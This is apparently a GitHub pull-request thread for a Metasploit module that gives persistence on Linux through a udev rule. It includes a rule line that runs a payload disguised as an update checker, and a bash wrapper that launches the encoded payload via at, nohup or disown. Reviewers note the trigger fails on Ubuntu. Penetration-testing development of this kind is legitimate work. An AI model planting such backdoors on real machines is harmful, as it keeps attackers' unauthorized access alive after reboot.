Add modules/exploits/linux/local/udev_persistence.rb

[jvoisin]

Add a way to persist via udev rules.

Verification

• Start msfconsole
• Get a shell
• use exploits/linux/local/udev_persistence
• Reboot the target
• Verify that you get a shell once the target comes back online

[jheysel-r7]

Thanks for the module @jvoisin! I started a payload handler but wasn't able to get this working by rebooting the target or by bringing up network interfaces manually or by attempting to trigger udev rules with udevadm trigger -v --subsystem-match=net

I was able to return a session by manually executing the payload file: /usr/bin/udev-check-updates but the persistence mechanism wasn't working for me.

I noticed some potential syntax errors, I'm wondering if there were maybe some changes made after you tested this? I've been testing on Ubuntu 22.04 (Linux 6.8.0-45-generic)

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[dledda-r7]

Hello @jvoisin, tried the module but seems the rule is not triggered at boot time, the payload is written correctly and works, I will try to investigate further, would you mind adding the docs for this post module later? I opened a PR #19542 that you can use as base when it get landed.

UPDATE

it looks like in Ubuntu 22.04 there is no at preinstalled.

user@ubuntuvm01:~$ /usr/bin/at
-bash: /usr/bin/at: No such file or directory
user@ubuntuvm01:~$ /bin/at
-bash: /bin/at: No such file or directory
user@ubuntuvm01:~$

[jvoisin]

I added some documentation, and a check for the presence of /usr/bin/at

[dledda-r7]

I added some documentation, and a check for the presence of /usr/bin/at

I think we can get rid of the at dependency honestly and just providing the path to the script

write_file(datastore['BACKDOOR_PATH'], 'SUBSYSTEM=="net", KERNEL!="lo", RUN+="' + datastore['PAYLOAD_PATH']+'"')

I will do some tests.

[jvoisin]

It's non-trivial

[dledda-r7]

I see what you mean, I'm think we can make a child bash process with & and disown or using nohup directly, I'll try something now

Update

So i tried to play a bit with som bash scripting and maybe we can have a script like this

    backdoor = <<~EOF
      #!/bin/sh
      PAYLOAD_ENC="#{payload.encoded}"
      if [ -f /usr/bin/at ]; then
          echo sh -c "$PAYLOAD_ENC" | at -M now
      elif [ -f /usr/bin/nohup ]; then
          nohup sh -c "$PAYLOAD_ENC" > /dev/null 2>&1&
      else
          echo sh -c "$PAYLOAD_ENC" & disown | bash
      fi
    EOF
    upload_and_chmodx(datastore['PAYLOAD_PATH'], backdoor)

However for now I am still not able to trigger the rule on ubuntu 24.04 LTS, can you provide some details where you tested that? I also tried to change the default rules location but nothing.